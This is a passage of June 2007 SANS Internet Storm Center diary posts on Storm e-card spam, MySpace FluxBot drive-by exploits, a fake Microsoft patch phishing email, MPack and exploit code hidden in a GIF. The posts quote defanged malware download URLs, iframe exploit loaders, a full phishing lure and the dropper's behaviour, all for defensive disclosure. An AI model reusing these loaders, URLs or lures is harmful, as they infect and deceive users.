Published: 2007-06-30

Tick tock - where has the time gone

Reader Paul recently sent an email to us stating that he could not get to tick.usno.nav.mil or tock.usno.navy.mil for time synchronization. Upon quick investigation, we determined that this was a universal problem. The two DNS names resolve to and respectively. This is a clear indication that DNS resolution for these names are working fine.

From there, we began to do traceroutes from various looking glasses in order to determine if this problem is universal. What we saw was that regardless of the looking glass, the traffic never made it past 2 hops at the most. This lead us to believe it could be a BGP problem, so we started to determine if the problem was with just the network in question or if the whole AS was down.

Further research pointed out that this network is part of AS721. However, it appears as if this network is no longer listed as part of that AS number based upon the CIDR Report for the AS. So it seems clear that there was a recent change removing this network from the AS and hence this is the reason those addresses are not reachable.

The final conclusion is that either the network was removed from the AS in error, or the systems were moved to a different address range without the DNS records being updated. We would notify the cert.mil if we had the ability to visit their website. Unfortunately, we do not.


Published: 2007-06-30

The wave continues - Subject line variation

In a followup to our previous story about the e-card exploit, we have received an unconfirmed report from one of our readers that the subject lines have begun to change. At this point in time, the reader has reported us the following variations:

You've received [a|n] [greeting|] [postcard|ecard] from a [admirer|class-mate|colleague|family member|friend|mate|neighbor|neighbour|partner|school friend|school mate|school-mate|worshipper]!

If you are seeing these or other variations, please let us know so that we can update this article accordingly and help email administrators in setting their mail filters accordingly.



Published: 2007-06-29

ReAssure Project

As a part of my daily activities, I set up, modify or use a number of  virtual machines that are used in my security research.  One of the others in the ISC stumbled across a very interesting project involving virtual systems.  The project is called ReAssure and is intended to give faculty staff and students a platform to use virtual machines in experimentation more effectively.  Also it appears that they provide a much more convenient way of storing and sharing these virtual images in a way that lends itself to derivative research. I would expect that others may be interested in this project and may be able to learn from the efforts at Purdue.

For more information, see http://projects.cerias.purdue.edu/reassure/


Published: 2007-06-29

Bootable USB Security Distro on USB Key

Greetings everyone.  For many of us, Friday (or Saturday) is the end of the quarter or even potentially the end of a fiscal year.  So, amongst the emails related to the Fake MS Patch, MySpace Flux Malware and Storm Wave emails and the interruptions of a retirement party and trying to spend money at the last minute,  I stumbled across something that may be useful for a number of our readers.

Oiepie (a blog site in NL), posted back in December the instructions needed to convert a standard USB key into a bootable Security toolkit.  The writer of the site used the old version of the BackTrack live linux iso and a 1G USB device for this project, but you can modify the steps for the BackTrack2, Helix, or similar and have a handy toolkit at hand.

For those that are Unix or Linux admins, I apologize up front since this probably isn't as useful for you.  But for those that primarily use other operating systems but haven't been a Unix admin in recent years, this might be a very welcome instruction set.

The instructions are located at http://www.oiepoie.nl/2006/12/20/bootable-security-distro-on-your-usb-stick/





Published: 2007-06-28

Riding out yet Another Storm Wave

Sadly you won't need a surf board for this one.  Just to give you a
heads up, there is a new round of emails with malicious links that is
making its way to the inbox of many folks.  If you haven't gotten one
yet, just give it time.   Here is quick summary of what we have found. 

The subject line that we have gotten examples
of have all been identical.  You may have gotten something else.

"Subject: You've received a postcard from a family member!"

The following is an excerpt from the email body.  (WARNING:  Do NOT


Click on the following Internet address or
copy & paste it into your browser's address box.


Copy & paste the ecard number in the "View Your Card" box at

Your ecard number is

The ecard numbers in the URL above are variable across SPAM samples.

Several additional examples for pattern freaks :):


The website has an interesting javascript that appears to have multiple ways to exploit a browser in order to compromise a system.  If javascript is enabled, then you get:

MD5 (tm.exe) = 07276fce39282fd182757d2557f9eca7  which is a downloader that gets this:

MD5 (logi.exe) = 4aa22564a0b886226d8cf14456a598ab

If javascript is disabled, then they provide you a handy link to click on to exploit yourself and you get ecard.exe = MD5: 30051dc10636730e4d6402ef8e88fd04.  Here is what a user would see:

 "We are currently testing a new browser feature. If you are not able to
view this ecard, please click here to view in its original format."

Here is a listing of just a handful of the 10s to 100s of thousands of
infected home systems.  Every storm infected system is potentially
capable of hosting the malware and sending the SPAM, but only a few will
be used in any given SPAM run depending on how many emails they want
sent and how many web hits they're expecting. You will notice the
Country/Network diversity and the predominance of broadband providers
(data courtesy of Team Cymru)

AS    | IP              | BGP Prefix       | CC | Registry | AS Name
5603  | |  | SI | ripencc  | SIOL-NET
SiOL Internet
29737 |   |  | US | arin     |
16810 |    |     | US | arin     | CAVTEL02 -
Cavalier Telephone
7132  |  |    | US | arin     | SBIS-AS -
AT&T Internet Svcs/Ameritech
7132  |   |    | US | arin     | SBIS-AS -
AT&T Internet Svcs/SBC Global
3320  |   |    | DE | ripencc  | DTAG
Deutsche Telekom/Dialin.net
12392 |    |    | BE | ripencc  | ASBRUTELE
AS/Brutele SC
21502 |    |     | FR | ripencc  |
18881 |   |   | BR | lacnic   | Global
Village Telecom
25515 | | | RU | ripencc  | CTCNET-AS
Joint-Stock Central Telecom.
8642  |  |    | SE | ripencc  | B2 B2

As you can see, detection is skimpy at this point. The key detect below
is "Tibs". (aka Storm/Nuwar/Peacomm)

Complete scanning result of "ecard.exe", received in VirusTotal at
06.28.2007, 21:24:37 (CET).

Antivirus Version Update Result
AhnLab-V3 2007.6.27.0 06.28.2007  no virus found
AntiVir 06.28.2007 HEUR/Crypted
Authentium 4.93.8 06.27.2007  no virus found
Avast 4.7.997.0 06.27.2007  no virus found
AVG 06.28.2007  no virus found
BitDefender 7.2 06.28.2007  no virus found
CAT-QuickHeal 9.00 06.27.2007  no virus found
ClamAV devel-20070416 06.28.2007  no virus found
DrWeb 4.33 06.28.2007  no virus found
eSafe 06.27.2007 Suspicious Trojan/Worm
eTrust-Vet 30.8.3747 06.28.2007  no virus found
Ewido 4.0 06.27.2007  no virus found
FileAdvisor 1 06.28.2007  no virus found
Fortinet 06.28.2007  no virus found
F-Prot 06.28.2007  no virus found
F-Secure 6.70.13030.0 06.28.2007 Tibs.gen118
Ikarus T3.1.1.8 06.28.2007  no virus found
Kaspersky 06.28.2007  no virus found
McAfee 5062 06.27.2007  no virus found
Microsoft 1.2701 06.28.2007  no virus found
NOD32v2 2360 06.28.2007  no virus found
Norman 5.80.02 06.27.2007 Tibs.gen118
Panda 06.28.2007 Suspicious file
Sophos 4.19.0 06.24.2007  no virus found
Sunbelt 2.2.907.0 06.27.2007 VIPRE.Suspicious
Symantec 10 06.28.2007  no virus found
TheHacker 06.28.2007  no virus found
VBA32 06.27.2007  no virus found
VirusBuster 4.3.23:9 06.27.2007  no virus found
Webwasher-Gateway 6.0.1 06.28.2007 Heuristic.Crypted

Aditional Information
File size: 7915 bytes
MD5: 30051dc10636730e4d6402ef8e88fd04
SHA1: 05368309bf89a78d680e239f58ec39bb0f8963b6




Published: 2007-06-26

MySpace Flux Malware

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

  FluxBot (aka "FastFlux", "Storm") is typically used to hide phishing and malware delivery sites behind complex ever changing networks of proxy servers. A system infected with FluxBot will be used a one of these proxies.

  Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

  A typical excerpt from an infected profile (obfuscated to protect the innocent): 


<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.

   The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:

    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
   The domain used here is of course again served via flux. header_03.gif


    <iframe src="http://fafb4c4c .com/routine.php" width=1

   Are we there yet? yup. just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:

http://fafb4c4c .com/session.exe (this is just the downloader stub)

The downloader will now retrieve the actual bot. We have seen among others these

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

Settings for the bot can be found here:

http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

once its all set and done, you will be a proud new member of the flux net and soon you
will find your system to participate in phishing and similar endevours.

Couple IPs that may be worthwhile to block:

AS13767   | 
AS15083   |
AS25761   |    
AS25761   |   

As you can imagine, its a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.





Published: 2007-06-26

Microsoft Re-Releases MS07-022

On June 26th 2007,  Microsoft re-released the  MS07-022 update for Windows 2000 SP4.  This update addresses some problems related to the NEC 98 hardware.  For more information related to the issues, please see http://support.microsoft.com/kb/931784/.


Published: 2007-06-26

FAKE Microsoft patch email -> Fake Spyware Doctor!

Several of our readers reported an email that lead to a fake Microsoft patch being spammed on the net today. The email had their full names and in one case the company they worked for included in the body of the email. So far I have seen 4 different urls. We are working on getting the systems hosting the malware cleaned or shutdown. We have submitted the malware itself to most of the AV vendors so detection should improve but currently it is not detected.

Thanks go out to PatrickC, TroyP, NathanM, BruceD and CalebC.

You can see in the body of the email below that the spelling is bad and the license key is not in the right format for XP nor Outlook.

One of the submitters “PatrickC” provided the following email for a fake Microsoft patch and malware site.  

“The following email I received is new to me. The URL points to
==Sanitized email header==============
X-Envelope-To: <patrick >
<SNIP to protect Patrick >
Date: Tue, 26 Jun 2007 14:51:39 +0200
Precedence: bulk
To: Patrick 
Subject: Microsoft Security Bulletin MS07-0065 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Content-Type: text/html; charset=iso-8859-1
Message-Id: <E1I3AWB-00010F-00@s137553944.websitehome.co.uk>
X-Antivirus: avast! (VPS 000752-0, 2007-06-25), Inbound message
X-Antivirus-Status: Clean 
Microsoft.com Home |
| Windows Family | Windows Marketplace | Office Family | Microsoft Update  
Dear Patrick

You are receiving this message because you are using Genuine Microsoft Software and your e-mail address has been subscribed to the Microsoft Windows Update mailing list.

A new 0-day vulnerability has appeared in the wild and was reported for the first time Monday, June 18th. The vulnerability affects machines running MICROSOFT OUTLOOK and allows an attacker to take full control of the vulnerable computer if the exploitation process is succesfull.

Since then, more than 100,000 machines have been reported as exploited and used to promote spammy pharmacy products such as viagra and cialis.

An update has been released to fix this issue and can be downloaded from the following link :

http://windowsupdate.microsoft.com/outlook/upd ate-0-day/download.aspx?id=63852

Quick Details
File Name: MSOUTRC2007Update-KB863892.exe
Version: 3.1.1023
Date Published: 06/25/2007
Download Size: 20 Kb
Estimated Download Time: 1 sec

It's urgent to download and install the update as soon as possible in order to decrease the number of succesfull attacks that occure each day. The update is only available for Genuine Versions of Microsoft Outllok. 
Instructions :  
1. Click the link above to start the download
2. Save the update in your WINDOWS directory and run it from there.If you want to start the installation immediately click Run in the download box, after you click the link.
3. After you run it, the update will download the security packages required to patch Microsoft Outlook.The entire process will take around 10-15 minutes, and you'll receive a confirmation message once the update process is completed.

Your Microsoft Windows Licence Information is :


Thank you

Microsoft Corp.


From Norman Sandbox:

MSOUTRC2007Update-KB863892.exe : INFECTED with W32/Malware (Signature: NO_VIRUS)

 [ DetectionInfo ]
    * Sandbox name: W32/Malware
    * Signature name: NO_VIRUS
 [ General information ]
    * Drops files in %WINSYS% folder.
    * File length:        20480 bytes.
    * MD5 hash: c7a8bde380043b5d8d7229e82db1c2fc.
 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\sdoctor.exe.
    * Creates file C:\france.html.
    * Deletes file c:\france.html.
 [ Changes to registry ]
    * Creates value "SpywareDoctor"="C:\WINDOWS\SYSTEM32\sdoctor.exe" in key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
 [ Process/window information ]
    * Will automatically restart after boot (I'll be back...).
    * Attemps to NULL C:\COMMAND.COM /c del c:\sample.exe >> NUL.
    * Modifies other process memory.
    * Creates a remote thread.
[ Signature Scanning ]
    * C:\WINDOWS\SYSTEM32\sdoctor.exe (20480 bytes) : no signature detection.

We notified one of the support teams at a hosting provider that a virus was found on one of there customers systems.

Their auto responder responded within a minute.
A support person removed the malware and responded within 30 minutes.
When I tried to verify that I found the malware was still there or back.
When I notified the hosting provider that the malware was back the support person analysised logs, determined it was being uploaded via ftp and immediately disabled the ftp account involved.


Published: 2007-06-26

Spam volume

Today, Robert reported that he is seeing a higher then normal spam volume. We do get notes like this rather regularly. Usually, its just a matter of "your turn coming up" in the global spam game. Here a few URLs I use to check on the global spam volume:

Spamcop http://spamcop.net/spamgraph.shtml?spamstats

Messagelabs: http://www.messagelabs.com/intelligence.asp

Postini: http://www.postini.com/stats


Published: 2007-06-26

Preventing spoofed internal e-mail

Nick submitted a nice piece of malware we are currently looking at. The malware itself includes a nice rootkit that doesn't appear to be detected with common rootkit tools. However, in my opinion, the delivery method was noteworthy. It used a spoofed internal sender. This made me wonder what's the best way to block e-mail that comes from outside mail servers, but claims an internal "From:" header.

My first guess would be that this is a great reason to enable SPF. Will this work?  I am assuming that it is a standard policy to require employees to use a VPN connection or "something like that" to send e-mail using an internal mail server.

Any other ideas?


Published: 2007-06-25

Blocking spoofed internal email from external sources

One suggestion from Chris in the UK.

SPF is a red herring here - you surely know what IP address(s) are yours (and hence may send mail using *your* domain).  You don't need SPF to tell you this.  Simply reject any such mails received from off-net.

Unfortunately, this will cause false positives e.g where someone posts to a remote mailing list.  The mail goes out then comes back in from a remote IP, (the list server) with your domain still as From: header.  Hence the sender doesn't get their own copy, nor does anyone else in your organisation who subscribes.

One solution is to add a special header to all mail you originate, so you can recognise it if comes via such a route.  This isn't cast iron, as it could be spoofed by a determined attacker, so some form of signing would be better in theory (domain keys?).  Nevertheless, I know some UK university sites who use the header method with good results.

Then there's the remote e-card type sites that originate greeting mails with your domain - but losing these is probably not the end of the world...




Published: 2007-06-24

Blocklists & Politics

Philipp K from Vienna, Austria submitted this story, which I found very enlightening.  In it shows several things: The double-edged sword of blocklists, and just some of the politics of security.  Shown below is the submission, in its entirety.  Thank you Philipp for the interpretation!!

spamhaus.org put the IP range of the Austrian domain registry (nic.at) on their Spamhaus Block List [SBL] [1], even though they did not send spam messages. By doing that, they wanted to force nic.at to remove specific .at domains, whose subdomains reportedly host phishing sites. However nic.at did not comply as they claimed it would violate their general terms and conditions and it would also breach Austrian jurisdiction [2].

During the next few days different allegations occurred: It was claimed the subdomains where hacked (so the registration itself was all right) and nic.at referred spamhaus.org to the specific hosts’ and registrar as the specific problem was located there [3]. The number of offending pages varies from 15 [4] to hundreds [5], depending who (and also when) you asked. nic.at changed IP addresses only to be blocked a few hours later again. spamhaus.org refused to comment on its actions, making some issues even more confusing.

On the 21st spamhaus.org stopped the blocking [6] (only listing nic.at as supporter to "name and shame", still existing today [5]), as they reported all offending pages are gone. nic.at countered that they did not remove a single domain, but the specific hosts’ finally reacted (to who they had referred spamhaus.org right from the start).

Now the Internet Service Provider Austria [ISPA] is warning its members against spamhaus.org because of their "overreaction" [7].

This is just the short version; I have only described the most important developments for brevity.

Altogether this seems to be a big mess, being driven by different goals, points of view, and also ego. Using blocklists is a two edged sword (which has also been stated on isc.sans.org numerous times), but this story only makes me wonder for the sanity of the whole system.

[1] http://www.spamhaus.org/sbl/sbl.lasso?query=SBL55483

[2] http://www.heise.de/newsticker/meldung/91417

[3] http://futurezone.orf.at/it/stories/201402/

[4] http://www.heise.de/newsticker/meldung/91453

[5] http://www.heise.de/newsticker/meldung/91642

[6] http://www.spamhaus.org/organization/statement.lasso?ref=7

[7] http://futurezone.orf.at/it/stories/201924/


Published: 2007-06-24

Apple Releases Patch for Cross-Site Scripting Vulnerability

On Thursday Apple releases a patch which addresses a cross-site scripting vulnerability.  These can be downloaded from Apple Update or Apple Software Downloads.

From the Apple website


  • WebCore

    CVE-ID: CVE-2007-2401

    Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.9 or later, Mac OS X Server v10.4.9 or later

    Impact: Visiting a malicious website may allow cross-site requests

    Description: An HTTP injection issue exists in XMLHttpRequest when serializing headers into an HTTP request. By enticing a user to visit a maliciously crafted web page, an attacker could conduct cross-site scripting attacks. This update addresses the issue by performing additional validation of header parameters. Credit to Richard Moore of Westpoint Ltd. for reporting this issue.

  • WebKit

    CVE-ID: CVE-2007-2399

    Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.9 or later, Mac OS X Server v10.4.9 or later

    Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution

    Description: An invalid type conversion when rendering frame sets could lead to memory corruption. Visiting a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution. Credit to Rhys Kidd of Westnet for reporting this issue.


Published: 2007-06-23

Exploit against MS07-033 being used in the wild

The Symantec folks identified a website exploiting a bug from this months Microsoft patches, specifically the Microsoft Internet Explorer Speech API 4 COM Object Instantiation Buffer Overflow Vulnerability.  Here is the URL to their blog entry:


Apparently, the actual exploit is similar to the proof of concept code posted on a popular exploit site ten days ago.


Published: 2007-06-23

More Hostile Advertisement Filtering

Yesterday we published a diary about blocking active code in banner ads.  Adrian wrote to us to provide additional information on some of the tools he uses. 

Adblock plus is a blocklisting mechanism. It is useful for blocking images and all sorts of ads, when you know exactly what the URLs for those are, or you can make a reasonable wildcard for, but in the end it won't catch everything, and most importantly, it won't catch everything THE FIRST TIME. You have to know it to block it, and that means loading it at least once.

This is where NoScript comes in, it turns the javascript trust mechanism upside down, using whitelisting instead. So, instead of allowing everything by default, it blocks everything by default (and that means flash, javascript, java, etc), and you can decide EXACTLY which sites you allow content to come from and be executed.


If a web page pulls down javascript code from more than one place you can decide if you allow or deny javascript for each site that JS code is referenced from.  This means you can allow javascript to be executed for a page you know it's safe and at the same time block javascript from anywhere else that's referenced on that page.

NoScript + AdBlock plus +adblock filter subscriptions (i.e. self-updating) are a great way of filtering junk that's out there, and are working great as a team.

Other filters to consider:


ABP Tracking filter

RO List (for filtering ads on Romanian sites)

Jamie Plucinski's filter list

Thanks, Adrian!

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-06-22

Active Banner Ads

One of our readers, Walter, wrote to us today with a request to owners of websites:  please block any third-party advertisements that contain scripts or any form of mobile code.

Why?  Well, consider this scenario:

1) Sleazy vendor (or rogue affiliate) "rents" compromised home computers from a bot-farmer

2) Sleazy vendor submits to an adserver an innocent-looking ad for some legitimate-looking product, totally unrelated to the malware.

3) The innocent-looking ad contains javascript that re-directs the browser to a compromised bot, which in turn re-directs the browser to the final malware page.  Thus, a website blocking any ads linking to systemdoctor.com or winfixer won't help.  The user is re-directed to one of millions of compromised bots, and the bot re-directs to the malware page.

An example of malware-via-adserver is detailed at

This is not a new problem.  We covered cases like this in the past where an entire ad server gets compromised and the advertisements it is generating contain malware that gets injected via an iframe.  The correct solution is to only accept images from advertisers that are linked to another website, and no mobile code.  You clearly can't control what happens on that web site, but at least no mobile code is injected into your user's browsers just because they visited you.

One of our readers reminded us that Mozilla has a plug-in that allows Firefox readers to reject ads.  Also, I should have plugged a solution I've been using on my own computers for a few years - modifying your hosts.txt file to point all of the known ad servers at  Details are on MVPS.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-06-22

Hacking Harry

Well, it was bound to happen.  The "research" chat rooms and mailing lists are all buzzing about the clever hack that somebody claims to have pulled off.  We'll know for sure when the book comes out and we confirm or deny what's going on.  We're not going to reveal the supposed ending for those who enjoy reading the series about the young wizard but there's plenty of web sites that are already spoiling the fun.  So if you know somebody who is a Harry Potter fan and doesn't want to be spoiled, warn them about the supposed leak.

If it's true, then the way the bandit pulled of the heist should be noted by anybody responsible for protecting "secrets" whether they are national secrets, homeland security secrets (ahem!), or intellectual property secrets.  According to anonymous posts on a popular mailing list, a "usual milw0rm downloaded exploit" was delivered by targeting email to employees of the publishing company.  One or more employees clicked on the link, a browser opened, and they clicked on an animated icon.  The malware in the animated icon then opened up a reverse shell and it was game over.  Apparently there were plenty of draft copies laying around inside the company's harddrives so downloading a personal copy was easy.  I suppose if you watched The Devil Wears Prada last year you are thinking "yes, that's probably true." 

Note to CIOs:  you must recognize targeted attacks as a serious threat to the protection of your organization's intellectual property.  This is no longer just a theory or academic exercise.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2007-06-22

Fake Adobe Shockwave Player download page

Jason Frisvold wrote to us about a suspicious web page. One of his users visited the web page he submitted and subsequently got infected with a Trojan horse.

When we get reports of web pages like this one, I typically first download the web page with wget (faking the User Agent field, of course, so the target site thinks I’m using Internet Explorer). In almost 100% of cases the bad guys lately just insert hidden iframe links which point to web sites hosting various exploits.

However, the web site submitted by Jason didn’t have any such elements and I actually forgot about it until we heard again from Jason who managed to find out what happened here.

Shortly, it’s pure social engineering – the user is actually encouraged to install the malware himself. How does this work you might think?

When visited, the web page in question (a game site related to RuneScape) shows couple of broken icons and all links just point to another web page that conveniently inform the user that his version of Macromedia Flash Player needs to be updated. After this notice, the user is redirected to a web site hosting a complete replica of the Shockwave Player Download Center, as you can see below:

Fake Shockwave Download Center

All the links on this web page lead to Adobe’s web site except for one (I’m pretty sure you can guess which one).

Besides creating a really nice replica of Adobe’s web site, the bad guys also added this little JavaScript to it:

var message="";
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)

document.oncontextmenu=new Function("return false")

This JavaScript disables right click so you can’t use this context menu for any actions.

The downloaded malware contains a full installer that, when tested on VirusTotal, had very low detection.

Technically this attack wasn’t even worth the diary, however, the appearance could probably fool a lot of users. Although it’s extremely easy to see the fake web site (the URL was visible in the Address bar), the question is how many users would really do this. Would SSL help here? Yes, but again only if users pay attention and in this case they would first have to be trained to check for it when downloading files, and that’s another story.


Published: 2007-06-21

Summary of TCP services on your network

One of my colleagues asked for a simple way to see what services are live on a given network, in preparation, I suppose, for setting up a firewall.  Here's what I recommended as a quick and easy way to map both local tcp services and outgoing connections.

First, at your perimeter or on some internal router, capture all the tcp packets with both the SYN and ACK flags set.  As a general rule, there will be one of these for every connection established between a client and server.  Yes, this approach can have false negatives and false positives - see the body of the script below - but it's pretty close to reality.  On Windows, install winpcap and run windump like this:

windump -D

to find the number of the network interface leading toward the Internet.  Then run:

windump -i {interfacenum} -tnp -w c:\synacks.pcap "tcp[13] & 0x12 = 0x12"

On unixes, use:

route -n

to see the available interfaces, and run:

tcpdump -i {interface} -tnp -w /root/synacks.pcap 'tcp[13] & 0x12 = 0x12'

Let that run for a little while, then summarize the connections with synack-summary from:


Download this script.  It should run fine on unixes or in the cygwin window on windows systems (see http://www.cygwin.com)

You'll probably want to customize it a little.  Change the following lines to reflect any internal IP addresses for your network (feel free to remove or add lines):

-e 's/ \(12\.13\.14\.137\) / knownip\1 /' \
-e 's/ \(12\.13\.15\.1[6-9][0-9]\) / knownip\1 /' \

Also, give names to your systems.  If you have multiple machines all serving the same purpose, you can call them all "www" or "mail"; the names don't have to match the dns or netbios names.  Edit this block:

-e 's/ 12\.13\.14\.137 / dumbo /' \
-e 's/ 12\.13\.15\.162 / goofy /' \
-e 's/ 12\.13\.15\.163 / minnie /' \
-e 's/ 12\.13\.15\.166 / pluto /' \

If you're running this on the machine capturing the packets, run:

synack-summary /root/synacks.pcap | uniq -c | less

If the packets are being captured on another system, run this:

ssh root@router 'cat /root/synacks.pcap' | synack-summary - | uniq -c | less

Here's a sample of the lines you'll see:

     62 _               minnie                http
   2496 _               pluto                  ssh
   9179 _               pluto                rsync
    324 dumbo           _                     smtp
     10 goofy           _                     http
     21 minnie          _                     http

An underscore is a remote system.  The first column is the count, second is the client machine for outbound connections, the third is the server machine for local servers, and the 4th is the protocol.  Unknown ports will show up as "up:portnum" - if you see these, add a line to the script with the port name you want to use (see the block with "-e 's/ 21 $/ ftp /' \").

In this example, minnie and pluto are running http, ssh, and rsync servers, and dumbo, goofy and minnie make outbound smtp and http connections.

I'll bet you'll be surprised by some of the servers you find.  :-)

-- William Stearns, http://www.stearns.org/


Published: 2007-06-20

MPack Analysis

We mentioned a large MPack compromise in a diary two days ago.  Since then we've been accumulating more information about what is going on behind the scenes.  Earlier today VeriSign/iDefense released some pretty good analysis of how it works, what the value of it is, and other goodies.  This summary does not exist online but has been spread via email to the media and other outlets.  Rather than trying to summarize it, iDefense gave the Internet Storm Center permission to reprint it in its entirety.  Thanks, iDefense!

Greetings All,

MPack is the latest and greatest tool for sale on the Russian Underground.  $ash sells MPack for around $500-1,000. In a recent posting $ash attempted to sell a "loader" for $300 and a kit for $1,000. The author claims that attacks are 45-50 percent successful, including the animated cursor exploit and many others, including ANI overflow, MS06-014, MS06-006, MS06-044, XML Overflow, WebViewFolderIcon Overflow, WinZip ActiveX Overflow, QuickTime Overflow (all these are $ash names for exploits). Attacks from MPack , aka WebAttacker II, date back to October 2006 and account for roughly 10 percent of web based exploitation today according to one public source.

More than 10,000 referral domains exist in a recent MPack attack, largely successful MPack attack in Italy, compromising at least 80,000 unique IP addresses. It is likely that cPanel exploitation took place on host provider leading to injected iFrames on domains hosted on the server. When a legitimate page with a hostile iFrame is loaded the tool silently redirects the victim in an iFrame to an exploit page crafted by MPack. This exploit page, in a very controlled manner, executes exploits until exploitation is successful, and then installs malicious code of the attacker's choice.

Torpig is one of the known payloads for MPack attacks to date. This code relates back to the Russian Business Network (RBN), through which many Internet-based attacks take place today. The RBN is a virtual safe house for attacks out of Saint Petersburg, Russia, responsible for Torpig and other malicious code attacks, phishing attacks, child pornography and other illicit operations. The Italian hosts responsible for most of the domains seen in a recent MPack attack are using cPanel, a Web administration tool for clients.  A zero-day cPanel attack took place in the fall of 2006 leading up to the large scale vector mark-up language (VML) attacks at that time.  It appears likely that the Russian authors of the cPanel exploit, Step57.info, who are also related to the RBN used the exploit to compromise the Italian ISP and referral domains used in the latest mPack attack.

MPack uses a command and control website interface for reporting of MPack success. A JPEG screenshot of a recent attack is attached to this message.


1.  MPack is a powerful Web exploitation tool that claims about 50 percent success in attacks silently launched against Web browsers.

2. $ash is the primary Russian actor attempting to sell mPack on the underground, for about $1,000 for the complete MPack kit.

3. MPack leverages multiple exploits, in a very controlled manner, to compromise vulnerable computers. Exploits range from the recent animated cursor (ANI) to QuickTime exploitation.  The latest version of mPack, .90, includes the following exploits: 

          WinZip ActiveX overflow
          QuickTime overflow

4. The Russian Business Network (RBN) is one of the most notorious criminal groups on the Internet today.  A recent MPack attack installed Torpig malicious code hosted on an RBN server.  RBN is closely tied to multiple attacks including Step57.info cPanel exploitation, VML, phishing, child pornography, Torpig, Rustock, and many other criminal attacks to date.  Nothing good ever comes out of the Russian Business Network net block.

5. MPack attacks experience high success, according to attack log files analyzed by VeriSign-iDefense.  In just a few hours more than 2,000 new victims reported to an MPack command and control website.  A recent attack, largely focused in the area of Italy, involved more than 80,000 unique IPs.

Ken Dunham
Senior Engineer
Director of the Rapid Response Team

Marcus H. Sachs
Director, SANS Internet Storm Center



Published: 2007-06-20

Pump and dump scams now in PDF

Apparently the groups behind what we know as pump and dump spam have found a new way to bypass spam filters. As of yesterday, we’ve been observing e-mails with bogus text, often in german, each with a PDF in attachment.
These PDFs purport to be stock information, and are usually titled ‘German Stock Insider’. They contain much more detail on stock than we’re used to from previous dump and pump scams and include images for added realism. They even contain the following disclaimer:
“This is not an offer to buy or sell any security. German Stock Insider discloses that they were paid ten thousand Euros for distribution of this report.”
The messages are usually sent to name@domain with an attachment name of name_report.pdf. Apparently they are distributed most to .com and .org domains, though most of the reports we’ve received were from Europe. Each of the reports so far has had an MD5 hash of 2e4b2158909f276942dadf6a0b621b1a. Thanks to Günter for reporting his findings.  


Published: 2007-06-20

Other miscellaneous stuff I've come across recently


Complexity is bad for security


I've mentioned before that I read Spaf's blog.  He doesn't post too often, but he had a story last week that really resonated with me (and he referenced the story where the Mac+ beat a new AMD machine running XP in 53% of the tests they ran).  I started programming on machines where 256KB was a lot of RAM and 256MB was a lot of whole lot of disk (yes, I have been doing this a while).  Everyone likes all their new features, but that has resulted in bloated unmaintainable code and the size and complexity has a cost in security.


Honeypot-type fake service scripts/tools

Also, these fake SMB tools have been out a couple of months, but I missed them until they were mentioned this morning on the Darknet blog.  These are useful additions to the tools I run in my malware analysis environment to spoof other services.  Also, on the French Honeynet Project tools page are fake SNMP tools that I'll have to take a look at too.  Does anyone have a good compilation of these tools?  Let me know via the contact page and I'll summarize the results next week.



Published: 2007-06-20

Apple TV security update

Apple has released a bulletin and update to their Apple TV  software which fixes a buffer overflow (with possible remote code execution) in its UPnP IGD code (CVE-2007-2386, this is related to recent Mac OS X updates).  The devices should automatically install the update when it does its weekly check for updates.


Published: 2007-06-19

PHP code in GIF (Part 2)

The GIF + PHP code article from yesterday generated some good email.  Here is a good document that explains some of the mitigation techniques and explains the problems in more detail:  http://www.scanit.be/uploads/php-file-upload.pdf


Published: 2007-06-19

PHP Exploit Code in a GIF

So if you want to hide something, where is the best place to hide it?
In plain sight of course.  We received an email from Steve Caligo
about a major image hosting website that contained more than you
bargained for in at least one image.  No its not stego or porn.  In
one particular image file, there was a PHP coded exploit script.
Interestingly enough, the file itself contains a completely legitimate
1x1 gif image at the beginning of the file.  Doing a quick check for
the filetype:

 $ file cmdscanvt6.gif
cmdscanvt6.gif: GIF image data, version 89a, 1 x 1

So now you have exploit code in what appears to be a gif file, what
can you do with that?  Well a couple of quick things come to mind, One
idea was alluded to with the comment about hiding it in plain sight.
It is a clever way to pass exploit code to others without it setting
off alarms or attracting attention all while bypassing network
security tools.  Steve reported it to the website owners and now a
quick check back of the site shows a completely different file with
the same name there now. So who switched the image?  The person who
placed it there to begin with or the folks running the website?

The second idea, but completely untested at this point, is that PHP
will ignore everything else and just look for its delimiters.  Which
means, it would be a great method for a RFI attack.

Regardless, its interesting and scary to find a file that acts like a
regular gif file, but contains a script exploit.  Nice catch Steve,
thanks for passing it along!


Published: 2007-06-18

Vulnerability in Trillian

Trillian is a very popular instant messenger client.  iDefense found a bug in version 3.x.  Details are on the Cerulean Studios Blog page, as well as at iDefense.

Update now.

Marcus H. Sachs
Director, SANS Internet Storm Center



Published: 2007-06-18

Massive MPACK Compromise

If you're confused and thinking of the mime packer at this point, then
you haven't heard of "the other" mpack.  Let me introduce to you the
relatively new kid on the block.  MPACk is a tool that was first
discovered in December of 2006 by PandaLabs.

Its an PHP based application designed to run on a server.  With it
